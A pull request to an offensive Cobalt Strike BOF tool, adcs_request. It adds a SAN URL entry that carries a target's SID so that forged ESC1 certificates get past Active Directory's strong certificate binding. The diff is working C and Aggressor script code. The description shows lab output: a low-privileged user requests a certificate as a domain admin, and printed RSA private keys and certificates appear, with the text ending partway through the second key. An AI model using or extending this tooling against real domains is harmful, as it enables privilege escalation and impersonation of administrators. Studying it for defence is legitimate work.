### PR TITLE
adcs_request: allow embedding a SAN URL entry to satisfy strong certificate binding requirements

### DIFF
--- a/Remote/Remote.cna
+++ b/Remote/Remote.cna
@@ -1658,7 +1658,7 @@ beacon_command_register(
 );
 
 alias adcs_request {
-	local('$params $keys $args $adcs_request_ca $adcs_request_template $adcs_request_subject $adcs_request_altname $adcs_request_install $adcs_request_machine $app_policy');
+	local('$params $keys $args $adcs_request_ca $adcs_request_template $adcs_request_subject $adcs_request_altname $adcs_request_alturl $adcs_request_install $adcs_request_machine $app_policy');
 
     if(size(@_) < 2)
     {
@@ -1672,6 +1672,7 @@ alias adcs_request {
 	$adcs_request_template = "";
 	$adcs_request_subject = "";
 	$adcs_request_altname = "";
+	$adcs_request_alturl = "";
 	$adcs_request_install = 0;
 	$adcs_request_machine = 0;
     $app_policy = 0;
@@ -1681,12 +1682,13 @@ alias adcs_request {
 	$adcs_request_template = iff(-istrue $3, $3, "");
     $adcs_request_subject = iff(-istrue $4, $4, "");
     $adcs_request_altname = iff(-istrue $5, $5, "");
-    $adcs_request_install = iff(-istrue $6, $6, 0);
-    $adcs_request_machine = iff(-istrue $7, $7, 0);
-    $app_policy = iff(-istrue $8, $8, 0);
-    $dns = iff(-istrue $9, $9, 0);
+    $adcs_request_alturl = iff(-istrue $6, $6, "");
+    $adcs_request_install = iff(-istrue $7, $7, 0);
+    $adcs_request_machine = iff(-istrue $8, $8, 0);
+    $app_policy = iff(-istrue $9, $9, 0);
+    $dns = iff(-istrue $10, $10, 0);
 
-	$args = bof_pack($1, "ZZZZssss", $adcs_request_ca, $adcs_request_template, $adcs_request_subject, $adcs_request_altname, $adcs_request_install, $adcs_request_machine, $app_policy, $dns);
+	$args = bof_pack($1, "ZZZZZssss", $adcs_request_ca, $adcs_request_template, $adcs_request_subject, $adcs_request_altname, $adcs_request_alturl, $adcs_request_install, $adcs_request_machine, $app_policy, $dns);
 	beacon_inline_execute($1, readbof($1, "adcs_request"), "go", $args);
 }
 
@@ -1703,6 +1705,7 @@ Usage:   adcs_request CA [opt:TEMPLATE] [opt:SUBJECT] [opt: ALTNAME] [opt: INSTA
          TEMPLATE  Optional. The certificate type to request. Use \"\" for default of User/Machine
          SUBJECT   Optional. The subject's distinguished name. Use \"\" for default of current machine / user
          ALTNAME   Optional. The alternate subject's distinguished name. Use \"\" for default
+         ALTURL    Optional. SAN URL entry, can be used to specify the alternate subject's SID. Use \"\" to omit
          INSTALL   Optional. Install the certificate in current context? 0 = No, 1 = Yes. Default = 0
          MACHINE   Optional. Request a certificate for a machine instead of a user? 0 = No, 1 = Yes. Default = 0
          ADD_APP_POLICY Optional. Adds App policy to allow client auth and Acting as a certificate agent. (ESC15)
@@ -1716,7 +1719,7 @@ basic:
     adcs_request cert.example.org\\example-CERT-CA 
 
 all options:
-    adcs_request cert.example.org\\example-CERT-CA vulnTemplate CN=Administrator,CN=Users,DC=example,DC=org CN=second_adm,CN=Users,DC=example,DC=org 0 0
+    adcs_request cert.example.org\\example-CERT-CA vulnTemplate CN=Administrator,CN=Users,DC=example,DC=org CN=second_adm,CN=Users,DC=example,DC=org tag:microsoft.com,2022-09-14:sid:S-1-5-21-3006160104-3291460162-27467737-1123 0 0 0 0
 
 use quotes for any arguments with spaces.
 "

--- a/src/Remote/adcs_request/adcs_request.c
+++ b/src/Remote/adcs_request/adcs_request.c
@@ -140,7 +140,7 @@ fail:
 } // end _adcs_request_CreatePrivateKey
 
 
-HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivateKey, BSTR bstrTemplate, BSTR bstrSubject, BSTR bstrAltName, IX509CertificateRequestPkcs10V3 ** lppCertificateRequestPkcs10V3, BOOL addAppPolicy, BOOL dns)
+HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivateKey, BSTR bstrTemplate, BSTR bstrSubject, BSTR bstrAltName, BSTR bstrAltUrl, IX509CertificateRequestPkcs10V3 ** lppCertificateRequestPkcs10V3, BOOL addAppPolicy, BOOL dns)
 {
 	HRESULT	hr = S_OK;
 	IX500DistinguishedName * pDistinguishedName = NULL;
@@ -266,6 +266,21 @@ HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivat
 		hr = pAlternativeNames->lpVtbl->Add(pAlternativeNames, pAlternativeName);
 		CHECK_RETURN_FAIL("pAlternativeNames->lpVtbl->Add()", hr);
 
+		if ( !IsNullOrEmptyW(bstrAltUrl) )
+		{
+			// Add URL SAN
+			// Create an instance of the CAlternativeName class with the IAlternativeName interface
+			SAFE_RELEASE(pAlternativeName);
+			hr = OLE32$CoCreateInstance(&CLSID_CAlternativeName, NULL, CLSCTX_INPROC_SERVER, &IID_IAlternativeName, (LPVOID *)&(pAlternativeName));
+			CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CAlternativeName)", hr);
+			// Initialize the AlternativeName
+			hr = pAlternativeName->lpVtbl->InitializeFromString(pAlternativeName, XCN_CERT_ALT_NAME_URL, bstrAltUrl);
+			CHECK_RETURN_FAIL("pAlternativeName->lpVtbl->InitializeFromString()", hr);
+			// Add the AlternativeName to the collection of AlternativeNames
+			hr = pAlternativeNames->lpVtbl->Add(pAlternativeNames, pAlternativeName);
+			CHECK_RETURN_FAIL("pAlternativeNames->lpVtbl->Add()", hr);
+		}
+
 		// Initialize the X509ExtensionAlternativeNames collection from the AlternativeNames collection
 		hr = pExtensionAlternativeNames->lpVtbl->InitializeEncode(pExtensionAlternativeNames, pAlternativeNames);
 		CHECK_RETURN_FAIL("pExtensionAlternativeNames->lpVtbl->InitializeEncode()", hr);
@@ -291,7 +306,14 @@ HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivat
 		bstrAltNameValuePairName = OLEAUT32$SysAllocString(L"SAN");
 		// Create the AltNamePair Value
 		MSVCRT$memset(swzAltNamePairValue,0,MAX_PATH*sizeof(WCHAR));
-		MSVCRT$_swprintf(swzAltNamePairValue, L"%s=%s",(dns) ? L"dns" : L"upn", bstrAltName);
+		if ( !IsNullOrEmptyW(bstrAltUrl) )
+		{
+			MSVCRT$_swprintf(swzAltNamePairValue, L"%s=%s&url=%s",(dns) ? L"dns" : L"upn", bstrAltName, bstrAltUrl);
+		}
+		else
+		{
+			MSVCRT$_swprintf(swzAltNamePairValue, L"%s=%s",(dns) ? L"dns" : L"upn", bstrAltName);
+		}
 		SAFE_SYS_FREE(bstrAltNameValuePairValue);
 		bstrAltNameValuePairValue = OLEAUT32$SysAllocString(swzAltNamePairValue);
 		// Initialize the AltNamePair
@@ -514,7 +536,7 @@ fail:
 } // end _adcs_request_SendCertRequestMessage
 
 
-HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubject, LPCWSTR lpswzAltName, BOOL bInstall, BOOL bMachine, BOOL addAppPolicy, BOOL dns)
+HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubject, LPCWSTR lpswzAltName, LPCWSTR lpswzAltUrl, BOOL bInstall, BOOL bMachine, BOOL addAppPolicy, BOOL dns)
 {
 	HRESULT	hr = S_OK;
 	BSTR bstrCA = NULL;
@@ -523,6 +545,7 @@ HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubjec
 	LPWSTR lpswzDistinguishedName = NULL;
 	BSTR bstrSubject = NULL;
 	BSTR bstrAltName = NULL;
+	BSTR bstrAltUrl = NULL;
 	BSTR bstrExportType = NULL;
 	BSTR bstrPrivateKey = NULL;
 	BSTR bstrCertificate = NULL;
@@ -579,10 +602,14 @@ HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubjec
 	SAFE_SYS_FREE(bstrAltName);
 	bstrAltName = OLEAUT32$SysAllocString(lpswzAltName);
 
+	SAFE_SYS_FREE(bstrAltUrl);
+	bstrAltUrl = OLEAUT32$SysAllocString(lpswzAltUrl);
+
 	internal_printf("[*] CA            : %S\n", bstrCA);
 	internal_printf("[*] Template      : %S\n", bstrTemplate);
 	internal_printf("[*] Subject       : %S\n", bstrSubject);
 	internal_printf("[*] AltName (%s) : %S\n", (dns) ? "dns" : "upn", (bstrAltName?bstrAltName:L"N/A"));
+	internal_printf("[*] AltUrl        : %S\n", (bstrAltUrl?bstrAltUrl:L"N/A"));
 
 	// Initialize COM
 	hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
@@ -613,7 +640,7 @@ HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubjec
 	CHECK_RETURN_FALSE("CRYPT32$CryptBinaryToStringW", hr);
 
 	// Create the cert request
-	hr = _adcs_request_CreateCertRequest(bMachine, pPrivateKey, bstrTemplate, bstrSubject, bstrAltName, &pCertificateRequestPkcs10V3, addAppPolicy, dns);
+	hr = _adcs_request_CreateCertRequest(bMachine, pPrivateKey, bstrTemplate, bstrSubject, bstrAltName, bstrAltUrl, &pCertificateRequestPkcs10V3, addAppPolicy, dns);
 	CHECK_RETURN_FAIL(L"_adcs_request_CreatePrivateKey", hr);
 
 	// Create enrollment
@@ -658,6 +685,7 @@ fail:
 	SAFE_SYS_FREE(bstrPrivateKey);
 	SAFE_SYS_FREE(bstrExportType);
 	SAFE_SYS_FREE(bstrAltName);
+	SAFE_SYS_FREE(bstrAltUrl);
 	SAFE_SYS_FREE(bstrSubject);
 	SAFE_INT_FREE(lpswzDistinguishedName);
 	SAFE_SYS_FREE(bstrTemplate);

--- a/src/Remote/adcs_request/adcs_request.c
+++ b/src/Remote/adcs_request/adcs_request.c
@@ -579,7 +579,7 @@ HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubjec
 	internal_printf("[*] CA            : %S\n", bstrCA);
 	internal_printf("[*] Template      : %S\n", bstrTemplate);
 	internal_printf("[*] Subject       : %S\n", bstrSubject);
-	internal_printf("[*] AltName (%s)       : %S\n", (dns) ? "dns" : "upn", (bstrAltName?bstrAltName:L"N/A"));
+	internal_printf("[*] AltName (%s) : %S\n", (dns) ? "dns" : "upn", (bstrAltName?bstrAltName:L"N/A"));
 
 	// Initialize COM
 	hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

--- a/src/Remote/adcs_request/adcs_request.c
+++ b/src/Remote/adcs_request/adcs_request.c
@@ -245,10 +245,6 @@ HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivat
 	if ( !IsNullOrEmptyW(bstrAltName) )
 	{		
 		// Format 1 - required for the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT scenario
-		// Create an instance of the CAlternativeName class with the IAlternativeName interface
-		SAFE_RELEASE(pAlternativeName);
-		hr = OLE32$CoCreateInstance(&CLSID_CAlternativeName, NULL, CLSCTX_INPROC_SERVER, &IID_IAlternativeName, (LPVOID *)&(pAlternativeName));
-		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CAlternativeName)", hr);
 		// Create an instance of the CAlternativeNames class with the IAlternativeNames interface
 		SAFE_RELEASE(pAlternativeNames);
 		hr = OLE32$CoCreateInstance(&CLSID_CAlternativeNames, NULL, CLSCTX_INPROC_SERVER, &IID_IAlternativeNames, (LPVOID *)&(pAlternativeNames));
@@ -257,12 +253,19 @@ HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivat
 		SAFE_RELEASE(pExtensionAlternativeNames);
 		hr = OLE32$CoCreateInstance(&CLSID_CX509ExtensionAlternativeNames, NULL, CLSCTX_INPROC_SERVER, &IID_IX509ExtensionAlternativeNames, (LPVOID *)&(pExtensionAlternativeNames));
 		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509ExtensionAlternativeNames)", hr);
+
+		// Add UPN or DNS SAN
+		// Create an instance of the CAlternativeName class with the IAlternativeName interface
+		SAFE_RELEASE(pAlternativeName);
+		hr = OLE32$CoCreateInstance(&CLSID_CAlternativeName, NULL, CLSCTX_INPROC_SERVER, &IID_IAlternativeName, (LPVOID *)&(pAlternativeName));
+		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CAlternativeName)", hr);
 		// Initialize the AlternativeName
 		hr = pAlternativeName->lpVtbl->InitializeFromString(pAlternativeName, (dns) ? XCN_CERT_ALT_NAME_DNS_NAME : XCN_CERT_ALT_NAME_USER_PRINCIPLE_NAME, bstrAltName);
 		CHECK_RETURN_FAIL("pAlternativeName->lpVtbl->InitializeFromString()", hr);
 		// Add the AlternativeName to the collection of AlternativeNames
 		hr = pAlternativeNames->lpVtbl->Add(pAlternativeNames, pAlternativeName);
 		CHECK_RETURN_FAIL("pAlternativeNames->lpVtbl->Add()", hr);
+
 		// Initialize the X509ExtensionAlternativeNames collection from the AlternativeNames collection
 		hr = pExtensionAlternativeNames->lpVtbl->InitializeEncode(pExtensionAlternativeNames, pAlternativeNames);
 		CHECK_RETURN_FAIL("pExtensionAlternativeNames->lpVtbl->InitializeEncode()", hr);

--- a/src/Remote/adcs_request/adcs_request.h
+++ b/src/Remote/adcs_request/adcs_request.h
@@ -6,8 +6,8 @@
 #include "certenroll.h"  // from /mnt/hgfs/git/external/winsdk-10/Include/10.0.16299.0/um
 
 HRESULT _adcs_request_CreatePrivateKey(BOOL bMachine, IX509PrivateKey ** lppPrivateKey);
-HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivateKey, BSTR bstrTemplate, BSTR bstrSubject, BSTR bstrAltName, IX509CertificateRequestPkcs10V3 ** lppCertificateRequestPkcs10V3, BOOL addAppPolicy, BOOL dns);
+HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivateKey, BSTR bstrTemplate, BSTR bstrSubject, BSTR bstrAltName, BSTR bstrAltUrl, IX509CertificateRequestPkcs10V3 ** lppCertificateRequestPkcs10V3, BOOL addAppPolicy, BOOL dns);
 HRESULT _adcs_request_CreateEnrollment(IX509CertificateRequestPkcs10V3 * pCertificateRequestPkcs10V3, IX509Enrollment ** lppEnrollment);
 HRESULT _adcs_request_SubmitEnrollment(IX509Enrollment * pEnrollment, BSTR bstrCA, BSTR * lpbstrCertificate);
 
-HRESULT adcs_request( LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubject, LPCWSTR lpswzAltName, BOOL bInstall, BOOL bMachine, BOOL addAppPolicy, BOOL dns );
+HRESULT adcs_request( LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubject, LPCWSTR lpswzAltName, LPCWSTR lpswzAltUrl, BOOL bInstall, BOOL bMachine, BOOL addAppPolicy, BOOL dns );

--- a/src/Remote/adcs_request/entry.c
+++ b/src/Remote/adcs_request/entry.c
@@ -18,6 +18,7 @@ VOID go(
 	LPCWSTR lpswzTemplate = NULL;
 	LPCWSTR lpswzSubject = NULL;
 	LPCWSTR lpswzAltName = NULL;
+	LPCWSTR lpswzAltUrl = NULL;
 	LPCWSTR lpPrivKey = NULL;
 	BOOL bInstall = FALSE;
 	BOOL bMachine = FALSE;
@@ -34,6 +35,7 @@ VOID go(
 	lpswzTemplate = (LPCWSTR)BeaconDataExtract(&parser, NULL);
 	lpswzSubject = (LPCWSTR)BeaconDataExtract(&parser, NULL);
 	lpswzAltName = (LPCWSTR)BeaconDataExtract(&parser, NULL);
+	lpswzAltUrl = (LPCWSTR)BeaconDataExtract(&parser, NULL);
 	bInstall = (BOOL)BeaconDataShort(&parser);
 	bMachine = (BOOL)BeaconDataShort(&parser);
 	addAppPolicy = (BOOL)BeaconDataShort(&parser);
@@ -46,6 +48,7 @@ VOID go(
 		lpswzTemplate,
 		lpswzSubject,
 		lpswzAltName,
+		lpswzAltUrl,
 		bInstall,
 		bMachine,
 		addAppPolicy,
@@ -69,6 +72,8 @@ fail:
 #define TEST_TEMPLATE L""
 #define TEST_SUBJECT L""
 #define TEST_ALTNAME L""
+#define TEST_ALTURL L""
+//#define TEST_ALTURL L"tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105"
 #define TEST_INSTALL FALSE
 #define TEST_MACHINE FALSE
 #define TEST_APPPOLICY FALSE
@@ -80,6 +85,7 @@ int main(int argc, char ** argv)
 	LPCWSTR lpswzTemplate = TEST_TEMPLATE;
 	LPCWSTR lpswzSubject = TEST_SUBJECT;
 	LPCWSTR lpswzAltName = TEST_ALTNAME;
+	LPCWSTR lpswzAltUrl = TEST_ALTURL;
 	BOOL bInstall = TEST_INSTALL;
 	BOOL bMachine = TEST_MACHINE;
 	BOOL bAppPolicy = TEST_APPPOLICY;
@@ -92,6 +98,7 @@ int main(int argc, char ** argv)
 		lpswzTemplate,
 		lpswzSubject,
 		lpswzAltName,
+		lpswzAltUrl,
 		bInstall,
 		bMachine,
 		bAppPolicy,

--- a/src/Remote/adcs_request/entry.c
+++ b/src/Remote/adcs_request/entry.c
@@ -71,6 +71,8 @@ fail:
 #define TEST_ALTNAME L""
 #define TEST_INSTALL FALSE
 #define TEST_MACHINE FALSE
+#define TEST_APPPOLICY FALSE
+#define TEST_DNS FALSE
 int main(int argc, char ** argv)
 {
 	HRESULT hr = S_OK;
@@ -80,6 +82,8 @@ int main(int argc, char ** argv)
 	LPCWSTR lpswzAltName = TEST_ALTNAME;
 	BOOL bInstall = TEST_INSTALL;
 	BOOL bMachine = TEST_MACHINE;
+	BOOL bAppPolicy = TEST_APPPOLICY;
+	BOOL bDNS = TEST_DNS;
 
 	internal_printf("\nRequesting a %S certificate from %S for the current user\n", lpswzTemplate, lpswzCA);
 
@@ -89,7 +93,9 @@ int main(int argc, char ** argv)
 		lpswzSubject,
 		lpswzAltName,
 		bInstall,
-		bMachine
+		bMachine,
+		bAppPolicy,
+		bDNS
 	);
 	if (S_OK != hr)
 	{

--- a/src/common/bofdefs.h
+++ b/src/common/bofdefs.h
@@ -587,6 +587,7 @@ WINBASEAPI WINBOOL WINAPI ADVAPI32$SystemFunction036(PVOID RandomBuffer,ULONG Ra
 #define KERNEL32$CreateFileA CreateFileA 
 #define KERNEL32$GetFileSize GetFileSize 
 #define KERNEL32$ReadFile ReadFile 
+#define KERNEL32$WriteFile WriteFile
 #define KERNEL32$DeleteFileW DeleteFileW 
 #define KERNEL32$CreateFileMappingA CreateFileMappingA 
 #define KERNEL32$MapViewOfFile MapViewOfFile 
@@ -858,6 +859,7 @@ WINBASEAPI WINBOOL WINAPI ADVAPI32$SystemFunction036(PVOID RandomBuffer,ULONG Ra
 #define OLEAUT32$SysAllocString SysAllocString
 #define OLEAUT32$SysReAllocString SysReAllocString
 #define OLEAUT32$SysFreeString SysFreeString
+#define OLEAUT32$SysStringLen SysStringLen
 #define OLEAUT32$VariantInit VariantInit
 #define OLEAUT32$VariantClear VariantClear
 #define OLEAUT32$SysAddRefString SysAddRefString


### PR DESCRIPTION
With recent Microsoft patches strong certificate binding is enforced.

This pull request adds a new option to the `adcs_request` BOF which allows to specify an URL entry to be added to the SAN. This allows to add the target's SID using the Microsoft specific prefix (`tag:microsoft.com,2022-09-14:sid:`) to satisfy strong binding requirements.

All commands below were run in a Ludus lab with the [ADCS role](https://docs.ludus.cloud/docs/environment-guides/adcs) applied.

Behavior before the proposed changes, try to abuse ESC1:
```
beacon> exec_bof ZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" domainadmin@ludus.domain 0 0 0 0
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (upn)       : domainadmin@ludus.domain
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAl1p42cnTk7232wFD0B4Kmd8n10IoDid/qeNIDAulOjuUg6pw
mJCS6AtoCCyluQWqC4kCOq5GAmvq8CoQbzs24LbVpdaFRBbnZL1shjqgfEqWGUin
v1E8becFDz4a3X1Go257rHyvya07uUy0gV4r8qcRLL1nuD2lVVe8hqQC1PRrA4Ed
ukWbi1RDobwtpmlu1emhXc0YVx6s4czSIJxsyn1Ywx6RnFjw5zHXeTA42DNZCy7X
czDfednzyZfDLNx82I7hwzvuWu2Llp/ZjAWm2Q36lmgWNx/PXXL+tAhLbcUHEbiE
zTPbcmQeInRCtjXcyAyawo5SzZ9wAy0FpCDJcQIDAQABAoIBAF0KSaYf8ocspfvk
ECq8fOnQC27BBVyGHW1zARQeiIh+nbI+sQ6oORaaBG6Z+5n8iGak55DpFrJgYsEW
Kpol/XswCa/zamLL7Zy48SCmo4ckVpbeWfg62Pn6fNq848jqPOU0gqQq1ekVK9Sh
+YhZOozk9KLbIApbIuqOj5747aC4WZOF2Cg6uXjdDXCZyOHYCm3DLJqKjnshnMLL
hWnKII1oAtPwhPGlQrjKMBfHAb7ibBHICZftGoka2xCdWakx/0aWXcvBFptwzR6N
30tH07jM21ZpW214cbelW+ZDwD2Mdj2wK8SEMKNbgzRNc4zX7cMKaH60rFzbLjAP
2VB4ZN0CgYEAwfUc76Tgu8mTv6qxEiUhdYrgzpioBK1ypiFQB5b4VjWKqdWeylwM
aujDK/yqur1WHzD9AnKaLp637gK3E2qasG7E4A7ro8HXtCYOzTTVIpbigZx6TGBJ
s1OuyAC3SeGBGIFIy4hIHgsTckhnHV4SrZsyTDL4nU6t/yoycdByV8cCgYEAx8ST
a7OoXBidCXKpHPGGoGPM1DvBUz847F9GpNkCq+APUjX87dpnmoMOQvTmEeV8b5pb
i90BgWgDk9iAjip783a1ujDq/lXcBO28Wr2DhjSOFFIeBPfSqgu+AH/v2a2vYUEC
k9gAD23b9NISiQymgCftUNxGaxHXQqflq0dqhQcCgYAcJp9UiPG1T8SKBRQ+NfVt
QgLu+WkphKMnSZ57+4V/vbWqgL7TUBjdS3tIXxvIjsJ5NHsEZ+3I5nB7sxkvUEGz
aeBZRNEeq3vLQdrUHd7xbkTh2vxFKZSI2pR7ot73cityixEtuVH+Sk1AQRH2STkc
yXG7bYp4CntmlZFMw5xU8QKBgQCLasuf/NBhBeSC9XzE8GMOiNgovlNb7+GgRZYd
8j4FCehnbbpJnYV0tkY7wILYtpozoTyGzgUA9UCZ7B08GrZK4exON1mpiu50mh48
Dcs+3GrUD8NXoEVr26oM2zzfZHHjo+VSnQrducQqhnndH/ELu9HJ/xE+JENhB6An
+z2B/QKBgFHk5sOOf2CcuxVaxyiaIjMzJfsRPTZzaVia8Mtb7VJCYeRweKwIs960
6cM7aBsW71ldNzVzPBE2h74KgSJ2I37p7YHg/zq2pqza8pwX0EYb9eUGr2WcE4T1
i7do61PChr/eEz61t37yOqnyx4bDErxVuS9vwE4QEforZ+6oQxQu
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFrTCCBJWgAwIBAgITFAAAAA96bMPlCme0xQAAAAAADzANBgkqhkiG9w0BAQsF
ADBCMRYwFAYKCZImiZPyLGQBGRYGZG9tYWluMRUwEwYKCZImiZPyLGQBGRYFbHVk
dXMxETAPBgNVBAMTCGx1ZHVzLUNBMB4XDTI1MDkyMTE4MzEyOFoXDTI2MDkyMTE4
MzEyOFowVDEWMBQGCgmSJomT8ixkARkWBmRvbWFpbjEVMBMGCgmSJomT8ixkARkW
BWx1ZHVzMQ4wDAYDVQQDEwVVc2VyczETMBEGA1UEAxMKZG9tYWludXNlcjCCASIw
DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJdaeNnJ05O9t9sBQ9AeCpnfJ9dC
KA4nf6njSAwLpTo7lIOqcJiQkugLaAgspbkFqguJAjquRgJr6vAqEG87NuC21aXW
hUQW52S9bIY6oHxKlhlIp79RPG3nBQ8+Gt19RqNue6x8r8mtO7lMtIFeK/KnESy9
Z7g9pVVXvIakAtT0awOBHbpFm4tUQ6G8LaZpbtXpoV3NGFcerOHM0iCcbMp9WMMe
kZxY8Ocx13kwONgzWQsu13Mw33nZ88mXwyzcfNiO4cM77lrti5af2YwFptkN+pZo
Fjcfz11y/rQIS23FBxG4hM0z23JkHiJ0QrY13MgMmsKOUs2fcAMtBaQgyXECAwEA
AaOCAogwggKEMD0GCSsGAQQBgjcVBwQwMC4GJisGAQQBgjcVCIXPuyKB9eBwh5WL
PITb0DiHpIYnf4zL7CGL8uAHAgFkAgEEMBMGA1UdJQQMMAoGCCsGAQUFBwMCMA4G
A1UdDwEB/wQEAwIHgDAbBgkrBgEEAYI3FQoEDjAMMAoGCCsGAQUFBwMCMB0GA1Ud
DgQWBBQ8tDRvAF0rgROmcuAxwPNEr75FeDAzBgNVHREELDAqoCgGCisGAQQBgjcU
AgOgGgwYZG9tYWluYWRtaW5AbHVkdXMuZG9tYWluMB8GA1UdIwQYMBaAFHSyXjgR
sNMXlg+5A0J6Gw0eJ+GaMIHNBgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8v
L0NOPWx1ZHVzLUNBLENOPUVEUi1EQzAxLTIwMjIsQ049Q0RQLENOPVB1YmxpYyUy
MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9
bHVkdXMsREM9ZG9tYWluP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9v
YmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYIKwYBBQUHAQEEga4w
gaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1sdWR1cy1DQSxDTj1BSUEsQ049
UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJh
dGlvbixEQz1sdWR1cyxEQz1kb21haW4/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVj
dENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggEB
AFpiF1GtO49fvrB6AMHP+qGmeCtX1W8fRfBAmsSmN7uKb/798b96NLVyI654n7kB
8NskfI6QAeOHpLV05/0I7QOhJt4wdHpuhcqPDDQB7Q2Z6pGs39mNlP81DxxNvMfu
WzH+p1dUQS4fxTYgk7YQuMdN+smYGpvTMYGo4cjmVABffq6+CGlXn9NOm0AYfyP3
uajlInI9rs0MxMyLB2nmb78BgfbuvC6UFUzcTXwN6x1vj7T0FynZH3yJEIsa3P7x
NzeVdNK43r4QBm5xxcmztu0rsjF9tlfpsy1FRzJtO5ALsIuDVEXE54Pl5uDKuE7v
l8URfXY4eQ9zhpS53e+iyOQ=
-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.
```

Show the SAN of the requested certificate:
```
$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"
            X509v3 Subject Alternative Name: 
                othername: UPN:domainadmin@ludus.domain
```

Authentication fails because strong certificate binding is not satisfied:
```
$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11               
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'domainadmin@ludus.domain'
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'domainadmin'
[-] See the wiki for more information
```

Instead, request a certificate using the patched BOF and supply the targets SID in a Microsoft specific SAN URL entry:
```
beacon> exec_bof ZZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" domainadmin@ludus.domain tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105 0 0 0 0
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (upn) : domainadmin@ludus.domain
[*] AltUrl        : tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAp7vE3cGPFlO1yuaQ77PccOcD798h2u27tqodO5Zs+eYqdzEC
IepNdCTPCWHZ8/V9phk278/2bMilYc6QMXP3MIXT8N4RoC+7de35OZLFCSd+fzpF
ZE6Fcj8bLoTwx/tUCCXo80i+u6vwu1iP/8LI+iIBVp98e1eAzZSuDMP6gcqBQv4L
4hvkoRWD6vCfXpmTEk7RwgsXDdXFc4W4AMz28kHXthr+fT01ijmfmbzULMeJ7gAp
yhAW5iueqcyKa4UpFY5M+CQR6j01FfaOaHGNn+XWEJg6b/JJTONnPSYJa6PfW1NB
exEM9S3c3CukOEMJ8Aip2/ySRf4K/tCuyavEdQIDAQABAoIBAFoQctb39dLxQ+4c
+7oaA8YD5ZNJZq5ddKvSkDvMu9s7gZXalOCNJOW2Vg0do6BhMwSbCWqfahxjaJoq
Bjbno9VEJtdxBlnTB399NpN5gZ82u6+pJFWF7BW6WOgTrg5Tn314jasEZpXy7yJJ
nZihiLT2yW0v2fGIvLqmmQZ1vO8vZKGYkfwaXp+2rBHQPV5w5v03IHDIse/A2cdq
6mru7Ar61LPpc3cTu4+Qgb/Of+JTd6Fn2Zt/Rdk7J1f8mSgKqgGDSQxiz5ohzfNH
